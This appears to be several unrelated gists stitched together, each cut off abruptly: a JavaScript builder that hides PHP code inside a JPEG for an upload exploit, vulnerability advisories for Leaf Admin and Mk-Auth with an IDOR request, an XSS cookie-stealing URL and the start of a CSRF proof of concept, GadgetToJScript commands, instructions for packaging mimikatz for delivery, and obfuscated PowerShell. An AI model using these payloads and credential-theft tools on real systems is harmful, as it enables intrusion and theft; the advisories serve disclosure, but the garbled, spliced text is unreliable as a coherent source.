This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length;
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
[Suggested description]
The profile photo upload feature in Leaf Admin 61.9.0212.10 f allows
Unrestricted Upload of a File with a Dangerous Type.
------------------------------------------
[Additional Information]
Leaf Admin is a virtual appliance running a web application used to
manage Internet Service Providers (ISP). It controls which users are
enabled or disabled on the system (due to payment issues), connection
# Command to generate HTA code using GadgetsToJScript
GadgetToJScript.exe -w hta
# Command to generate JS code using GadgetsToJScript
GadgetToJScript.exe -w js
# Command to generate VBS code using GadgetsToJScript
GadgetToJScript.exe -w vbs
# Command to generate VBA code using GadgetsToJScript
import argparse

class Decrypter:
    SIMPLE_STRING = "0123456789ABCDEF"
    SIMPLE_MAGIC = 0xA3

    def __init__(self, password):
        self.data = password

    def next(self):
It is basically a wrapper around the following projects:
- mimikatz (https://github.com/gentilkiwi/mimikatz)
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7)
  Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript)
INSTRUCTIONS:
1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (you may want to comment out the Exec() line, though)
   b) It is going to produce a file.b64, so copy its content and replace the Delivery.Package.file string with it
Product Description:
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to leak other users’ sensitive information, such as the CPF (a personal identification number used in Brazil), by manipulating the number of the invoice requested.
Additional Information:
Any authenticated user can read arbitrary invoices, even ones that do not belong to the authenticated user. The response leaks sensitive information about the user the invoice refers to. See below an example of a GET request:
GET /central/recibo.php?titulo=00006 HTTP/1.1
Vulnerability Type:
CWE-639: Authorization Bypass Through User-Controlled Key
Mk-Auth User Impersonation Via Reflected XSS and Unprotected Session Cookie
Product Description:
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to steal and reuse an admin session token by abusing a reflected XSS and an unprotected cookie.
Additional Information:
The session token (centralmka2) does not have the HttpOnly flag set, which allows JavaScript code to read its content. In addition, the “registro” parameter of the “logs_ajax.php” page is vulnerable to reflected XSS, which allows an attacker to take advantage of the misconfigured cookie. See below an example of a malicious request:
http://<mkserver>/admin/logs_ajax.php?registro=0&tipo=todos%27%3balert(document.cookie)%2f%2f
Vulnerability Type:
Mk-Auth CSRF in Clients Change Password Form
Product Description:
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.
Vulnerability Description:
It is possible to change a user’s password by enticing a logged-in user to access a malicious web page.
Additional Information:
A malicious actor may craft a web page such that, when a user authenticated on Mk-Auth (in the “central” module) accesses it, the user’s password is automatically replaced by one chosen by the attacker.
PoC:
<html>
function sandbanks {
    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
    [CmdletBinding()]
    Param (
        [Parameter(Position = 0)]
        [ValidateNotNullOrEmpty()]
        [String]
        $ModuleName = [Guid]::NewGuid().ToString()
    )
    $tzXzjieG99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())
package main

//#include "dllmain.h"
import "C"